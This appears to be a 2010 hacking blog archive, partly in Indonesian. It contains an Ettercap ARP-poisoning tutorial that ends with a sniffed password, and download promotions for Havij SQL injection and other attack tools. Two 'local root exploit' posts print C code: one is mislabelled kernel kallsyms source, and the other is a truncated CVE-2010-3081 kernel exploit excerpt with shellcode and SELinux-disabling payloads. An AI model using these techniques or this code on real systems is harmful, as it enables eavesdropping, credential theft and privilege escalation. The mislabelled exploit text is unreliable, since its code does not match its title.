Thursday 28 October 2010

Sniffing Using Ettercap

Di post ini saya mo demo’in tentang sebuah tool yang cukup maknyoos untuk melakukan packet sniffing pada perangkat switch. Oh ya ini kategori ilmu buaahayaa. Hem, supaya para pembaca yang awam pun bisa menikmati posting saya yang penuh dengan ilmu2 yang bermanfaat ini, saya jelaskan satu2 dan perlahan-lahan

1. Apa itu Packet?

Packet adalah kumpulan informasi yang kita kirimkan kepada perangkat (komputer, server, printer dsb) yang terletak pada jaringan intranet maupun internet. Bayangkan saja packet itu seperti suara anda ketika berbicara dengan orang lain. Ketika anda berbincang dengan orang lain, suara anda juga bisa didengar orang lain bukan? Lalu gimana jika ada seseorang menguping pembicaraan anda yang penting dan bersifat private, nggak seneng tho. Nah permasalahan inilah yang nanti saya bahas di posting ini.

2. Apa itu Switch?

Nah untuk berbincang – bincang dengan temen anda, pasti ada medium yang mengantarkan suara2 anda supaya bisa didenger kan? Kalo di dunia nyata kita tahu medium penghantarnya udara. Nah kalo di jaringan ada banyak medium penghantarnya, contoh: switch, hub, router dsb. Untuk kali ini kita kosentrasi ma switch aja dulu. Gimana sih cara switch menghantarkan paket2 di jaringan? Nah, cara berkomunikasi perangkat tu ada 4 macam (kalo saya nggak salah sih : multicast, broadcast, anycast dan unicast.

Pada switch cara berkomunikasinya adalah multicast dan unicast, intinya paket yang anda kirim dijamin nggak bakal salah sasaran, hanya orang yang berhak aja yang bisa dapat paket2 anda. So, kalo anda lagi ngegosip, orang lain nggak bakal denger apa yang anda omongin. Lalu bagaimana switch mengetahui bahwa paket yang dikirim itu tepat sasaran, caranya dengan mengirimkan paket ARP (Address Resolution Protocol) . Switch akan mencatatat alamat mac address (alamat fisik pada komputer anda) serta alamat IP (alamat nggak fisik ). Alamat fisik diibaratkan alamat rumah anda, alamat yang nggak brubah-ubah, sedangkan non fisik bisa aja no hp anak2 SMA yang hobi gonta ganti nomor, tapi nggak mungkin kan mreka gonta-ganti alamat rumah (kecuali ciblek or ayam kampus tentunya). Jadi meski anda gonta-ganti IP, switch nggak akan salah kirim paket.

3. Apa itu MITM (men in the middle attack)?

MITM

MITM

MITM adalah jenis serangan dengan berpura – pura menjadi user yang sah. Pada switch caranya dengan memalsukan dan memflood ARP response (ARP spoofing). Jadi ketika switch menanyakan alamat fisik setiap alamat IP, maka penyerang akan mengirimkan mac address alamat penyerang kepada switch untuk setiap alamat IP yang ditanyakan oleh swith. Jadi ketika switch tanya “Hoii, alamat mac address IP 10.14.10.2 apa?” maka penyerang akan membalasnya dengan alamat fisiknya, dan ini dilakukan untuk setiap IP komputer2 korban. Akhirnya setiap paket oleh switch akan dikirimkan oleh komputer penyerang (intinya, komputer penyerang tahu setiap paket yang serharusnya dia nggak tahu). Supaya korban nggak curiga kalo paketnya dah dicolong, maka penyerang akan memforward paket yg terlebih dahulu sudah dibaca oleh penyerang. Jadi si korban nggak akan curiga kalo tiba2 paketnya hilang. Komputer penyerang seolah – olah akan menjadi jembatan (bridge) antara komputer sah dengan komputer yang lain.

Cukup ngemeng2nya, sung demonya (di linux box):

1. suryo@daskom-admin:~$sudo ettercap -G -n 255.255.255.0 (akan muncul GUI ettercap seperti dibawah)

ettercap-gui

ettercap-gui

2. Klik sniff pilih unified sniffing, saya menggunakan lan card saya ketiga (eth2), saya punya 3 lan card di komputer saya.

memilih ethernet

memilih ethernet

3. Klik host, pilih scan for host.

4. Klik MITM pilih arp poisoning, plih sniff remote connections.

sniffing remote connections

sniffing remote connections

5. Klik start, pilih start sniffing.

6. Tuk melihat koneksi, klik view klik connections.

)

daftar korban

Dibawah ini hasil dari paket sniffing dengan ettercap, perhatikan ada seorang user yang memasukkan user dan passwordnya.

Got U'r Password

Got U'r Password

original site:http://pranotoutomo.wordpress.com

PacketFence NAC System

If you want more control over which devices or endpoints access the network, PacketFence is for you. If you are looking at giving only Internet access to guests on your network, PacketFence is for you. If your network is a breeding ground for attacks, computer viruses or worms, PacketFence is for you.

PacketFence is a network access control (NAC) system. It is actively maintained and has been deployed in numerous large-scale institutions. It can be used to effectively secure networks, from small to very large heterogeneous networks. PacketFence provides NAC-oriented features such as registration of new network devices, detection of abnormal network activities including from remote snort sensors, isolation of problematic devices, remediation through a captive portal, and registration-based and scheduled vulnerability scans.

Download

Malicious Cryptography

Cryptology is the study of the hidden word. It is an essential technology in times of war and has been in existence for thousands of years. The strategic positioning of troops is both a logistical challenge as well as a challenge from the perspective of information theory, since command and control information is subject to interception. It may be argued that cryptography has always had a dark side, since an enemy that uses it effectively will be able to conceal future enemy troop movements and other valuable information from allied forces. However, Malicious Cryptography digs much deeper into the dual-edged nature of cryptography. It shows how modern cryptographic paradigms and tools, including asymmetric cryptography, pseudorandom generators, reduction arguments, the random oracle model, etc. can in fact be used to degrade system security. The book details advanced computer viruses, worms, and Trojan horse programs that mount unprecedented attacks against their hosts. In short, it provides a glimpse of the future of information warfare, and also covers many of the tools that can be used to guard against these advanced threats to computing environments.

Link For Download

Thursday 21 October 2010

Creating Exploit - step by step RE_mind_ER

How to find vulnerabilities, write shellcode, exploit the vulnerability and finally turn it into a Metasploit exploit module! David Hoelzer is a Senior Fellow with the SANS Institute and author of the SANS Secure Coding in C/C++ course. TnX

Exploits - Part 1 - Exploit Creation in metasploit (intro)
YouTube Video

Exploits - Part 2 - 1 - Finding Flaws (part one and two)
YouTube Video
YouTube Video

Exploits - Part 3 - 1 - Writing Shellcode part one and two)
YouTube Video
YouTube Video

Exploits - Part 4 - 1 - Conversion to metasploit (part one and two)
YouTube Video
YouTube Video

Havij v1.1: Advanced SQL Injection

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.

The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.


The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

Link For Download

Samurai v0.8 Released

Samurai Web Testing Framework v0.8 Released
This is quite a major release with the integration of metasploit, target applications and tons of tool updates. It is now DVD sized as it has out grown the CD release.
The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites

Starting with reconnaissance, we have included tools such as the Fierce domain scanner and Maltego. For mapping, we have included tools such WebScarab and ratproxy. We then chose tools for discovery. These would include w3af and burp. For exploitation, the final stage, we included BeEF, AJAXShell and much more. This CD also includes a pre-configured wiki, set up to be the central information store during your pen-test.

The Samurai project team is happy to announce the release of a development version of the Samurai Web Testing Framework. This release is currently a fully functional linux environment that has a number of the tools pre-installed.

Wednesday 20 October 2010

OpenSCAP

The OpenSCAP Project was created to provide an open-source framework to the community which enables integration with the Security Content Automation Protocol (SCAP) suite of standards and capabilities. It is the goal of OpenSCAP to provide a simple, easy to use set of interfaces to serve as the framework for community use of SCAP.

SCAP is a line of standards managed by NIST. It was created to provide a standardized approach to maintaining the security of enterprise systems, such as automatically verifying the presence of patches, checking system security configuration settings, and examining systems for signs of compromise.

The SCAP suite contains multiple complex data exchange formats that are to be used to transmit important vulnerability, configuration, and other security data. Historically, there have been few tools that provide a way to query this data in the needed format. This lack of tools makes the barrier to entry very high and discourages adoption of these protocols by the community. It’s our goal to create a framework of libraries to improve the accessibility of SCAP and enhance the usability of the information it represents. Tools for parsing SCAP documents and querying content must be created to achieve this. This requires common set of interfaces to be defined and implemented to meet this need. It is the intent of this project to provide these interfaces and functional examples that would allow others in the open-source and vendor communities to make use of SCAP while minimizing the effort needed to gain value from it.

Proxy Switcher PRO v3.9.0.4

When you visit a particular website. Or your access to various social networking and entertainment sites has been blocked.

The solution is to use Proxy Switcher for all the anonymous browsing needs. It can be used to avoid all sorts of limitations imposed by various sites. Be that a download site that limits amount of downloads. Or video site works only in a particular country - more often than not it gets defeated by the anonymous browsing features Proxy Switcher provides.

On top of that, if you used to manually change proxy settings Proxy Switcher provides a way to change them much faster and easier.

Tuesday 19 October 2010

Acunetix Vulnerability Scanner

Acunetix adalah sebuah software yang berfungsi untuk melakukan scanning atas kelemahan yang bisa terjadi di situs Anda. Dengan memakai software ini, anda akan mengetahui apa saja kelemahan yang terdapat di situs anda beserta dengan saran apa yang harus Anda lakukan atas kelemahan yang di temukan tersebut.

Software ini secara otomatis akan memeriksa situs Anda terhadap kelemahan, metode nya antara lain :

* Version Check : Vulnerable Web Servers, Vulnerable Web Server Technologies – such as “PHP 4.3.0 file disclosure and possible code execution, CGI Tester, Checks for Web Servers Problems – Determines if dangerous HTTP methods are enabled on the web server (e.g. PUT, TRACE, DELETE), Verify Web Server Technologies.

* Parameter Manipulation : Cross-Site Scripting (XSS) – over 25 different XSS variations are tested, SQL Injection, Code Execution, Directory Traversal, File Inclusion, Script Source Code Disclosure, CRLF Injection, Cross Frame Scripting (XFS), PHP Code Injection, XPath Injection, Full Path Disclosure, LDAP Injection, and Cookie Manipulation.
* And Much Other

System Requirements
· Microsoft Windows XP Professional or Home Edition, Windows 2000,
Windows Server 2003 and Windows Vista.
· 1 GB of RAM.
· 200 MB of available hard-disk space.
· Microsoft Internet Explorer 6 (or higher).
· Microsoft SQL Server / Access support – if database is enabled
(optional).

Link For Download

Sunday 10 October 2010

Linux Kernel 2.6.32

===============================================
Linux Kernel 2.6.32 Local Root Exploit (x86_64)
===============================================

===============================================
Linux Kernel 2.6.32 Local Root Exploit (x86_64)
===============================================

Tested on: Windows XP

Exploit Tested: 2.6.32.9-rscloud #6 SMP Thu Mar 11 14:32:05 UTC 2010 x86_64 GNU/Linux

# Author: FuRty
# Email : fir4t@fir4t.org
# Web : www.mykingdom.us
# Greetz: RedGuard, Trsniper
# Special Thanks : KnocKout and Inj3ct0r Team
# Video : http://www.facebook.com/video/video.php?v=101428079927069

--------------------------------------------


#define _GNU_SOURCE

#include
#include
#include
#include

#define KSYM_NAME_LEN 127


struct sym_entry {
unsigned long long addr;
unsigned int len;
unsigned char *sym;
};


static struct sym_entry *table;
static unsigned int table_size, table_cnt;
static unsigned long long _text, _stext, _etext, _sinittext, _einittext, _sextratext, _eextratext;
static int all_symbols = 0;
static char symbol_prefix_char = '\0';

int token_profit[0x10000];

/* the table that holds the result of the compression */
unsigned char best_table[256][2];
unsigned char best_table_len[256];
static void usage(void)
{
fprintf(stderr, "Usage: kallsyms [--all-symbols] [--symbol-prefix=] < in.map > out.S\n");
exit(1);
}

/*
* This ignores the intensely annoying "mapping symbols" found
* in ARM ELF files: $a, $t and $d.
*/
static inline int is_arm_mapping_symbol(const char *str)
{
return str[0] == '$' && strchr("atd", str[1])
&& (str[2] == '\0' || str[2] == '.');
}

static int read_symbol(FILE *in, struct sym_entry *s)
{
char str[500];
char *sym, stype;
int rc;

rc = fscanf(in, "%llx %c %499s\n", &s->addr, &stype, str);
if (rc != 3) {
if (rc != EOF) {
/* skip line */
fgets(str, 500, in);
}
return -1;
}

sym = str;
/* skip prefix char */
if (symbol_prefix_char && str[0] == symbol_prefix_char)
sym++;

Full Download

Thursday 7 October 2010

kernel-2.6.18-164 2010

=========================================
kernel-2.6.18-164 2010 Local Root Exploit
=========================================
# Author: Hackeri-AL
# Email : h-al [at] hotmail [dot] it
# Group : UAH / United ALBANIA Hackers
# Web : uah1.org.uk
# Greetz: LoocK3D - b4cKd00r ~
--------------------------------------------

/*

Diagnostic test for CVE-2010-3081 public exploit

Greg Price, Ksplice, Inc.

Tests whether the system has previously been exposed to the exploit
published as "hackerial.c" by Hackeri-AL on 2010 Sep 15. Based on the
original exploit code.

For more information, see
http://www.ksplice.com/uptrack/cve-2010-3081

*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include


#define _GNU_SOURCE
#define __dgdhdytrg55 unsigned int
#define __yyrhdgdtfs66ytgetrfd unsigned long long
#define __dhdyetgdfstreg__ memcpy

#define BANNER "Diagnostic tool for public CVE-2010-3081 exploit -- Ksplice, Inc.\n" \
"(see http://www.ksplice.com/uptrack/cve-2010-3081)\n" \
"\n"

#define KALLSYMS "/proc/kallsyms"
#define TMAGIC_66TDFDRTS "/proc/timer_list"
#define SELINUX_PATH "/selinux/enforce"
#define RW_FOPS "timer_list_fops"
#define PER_C_DHHDYDGTREM7765 "per_cpu__current_task"
#define PREPARE_GGDTSGFSRFSD "prepare_creds"
#define OVERRIDE_GGDTSGFSRFSD "override_creds"
#define REVERT_DHDGTRRTEFDTD "revert_creds"
#define Y0Y0SMAP 0x100000UL
#define Y0Y0CMAP 0x200000UL
#define Y0Y0STOP (Y0Y0SMAP+0xFFC)
#define J0J0S 0x00200000UL
#define J0J0R00T 0x002000F0UL
#define PAGE_SIZE 0x1000

#define KERN_DHHDYTMLADSFPYT 0x1
#define KERN_DGGDYDTEGGETFDRLAK 0x2
#define KERN_HHSYPPLORQTWGFD 0x4

#define KERN_DIS_GGDYYTDFFACVFD_IDT 0x8
#define KERN_DIS_DGDGHHYTTFSR34353_FOPS 0x10
#define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM 0x20

#define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX 0x40

#define isRHHGDPPLADSF(ver) (strstr(ver, ".el4") || strstr(ver,".el5"))

#define __gggdfstsgdt_dddex(f, a...) do { fprintf(stdout, f, ## a); } while(0)
#define __pppp_tegddewyfg(s) do { fprintf(stdout, "%s", s); } while(0)
/* #define __print_verbose(s) do { fprintf(stdout, "%s", s); } while(0) */
#define __print_verbose(s) do { } while (0)
#define __xxxfdgftr_hshsgdt(s) do { perror(s); exit(-1); } while(0)
#define __yyy_tegdtfsrer(s) do { fprintf(stderr, s); exit(-1); } while(0)

static char buffer[1024];
static int s;
static int flags=0;
volatile static socklen_t magiclen=0;
static int useidt=1, usefops=0, uselsm=0;
static __yyrhdgdtfs66ytgetrfd _m_fops=0,_m_cred[3] = {0,0,0};
static __dgdhdytrg55 _m_cpu_off=0;
static char krelease[64];
static char kversion[128];

#define R0C_0FF 14
static char ttrg0ccc[]=
"\x51\x57\x53\x56\x48\x31\xc9\x48\x89\xf8\x48\x31\xf6\xbe\x41\x41\x41\x41"
"\x3b\x30\x75\x1f\x3b\x70\x04\x75\x1a\x3b\x70\x08\x75\x15\x3b\x70\x0c"
"\x75\x10\x48\x31\xdb\x89\x18\x89\x58\x04\x89\x58\x08\x89\x58\x0c\xeb\x11"
"\x48\xff\xc0\x48\xff\xc1\x48\x81\xf9\x4c\x04\x00\x00\x74\x02"
"\xeb\xcc\x5e\x5b\x5f\x59\xc3";

#define R0YTTTTUHLFSTT_OFF1 5
#define R0YGGSFDARTDF_DHDYTEGRDFD_D 21
#define R0TDGFSRSLLSJ_SHSYSTGD 45
char r1ngrrrrrrr[]=
"\x53\x52\x57\x48\xbb\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd3"
"\x50\x48\x89\xc7\x48\xbb\x42\x42\x42\x42\x42\x42\x42\x42"
"\xff\xd3\x48\x31\xd2\x89\x50\x04\x89\x50\x14\x48\x89\xc7"
"\x48\xbb\x43\x43\x43\x43\x43\x43\x43\x43"
"\xff\xd3\x5f\x5f\x5a\x5b\xc3";

#define RJMPDDTGR_OFF 13
#define RJMPDDTGR_DHDYTGSCAVSF 7
#define RJMPDDTGR_GDTDGTSFRDFT 25
static char ttrfd0[]=
"\x57\x50\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"
"\x58\x5f"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xc3";

/* implement selinux bypass for IDT ! */
#define RJMPDDTGR_OFF_IDT 14
#define RJMPDDTGR_DYHHTSFDARE 8
#define RJMPDDTGR_DHDYSGTSFDRTAC_SE 27
static char ruujhdbgatrfe345[]=
"\x0f\x01\xf8\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"
"\x0f\x01\xf8"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x48\xcf";


#define CJE_4554TFFDTRMAJHD_OFF 10
#define RJMPDDTGR_AYYYDGTREFCCV7761_OF 23
static char dis4blens4sel1nuxhayettgdr64545[]=
"\x41\x52\x50"
"\xb8\x00\x00\x00\x00"
"\x49\xba\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x89\x02"
"\x49\xba\x42\x42\x42\x42\x42\x42\x42\x42"
"\x41\x89\x02"
"\x58\x41\x5a";




/* rhel LSM stuffs */
#define RHEL_LSM_OFF 98

Full Download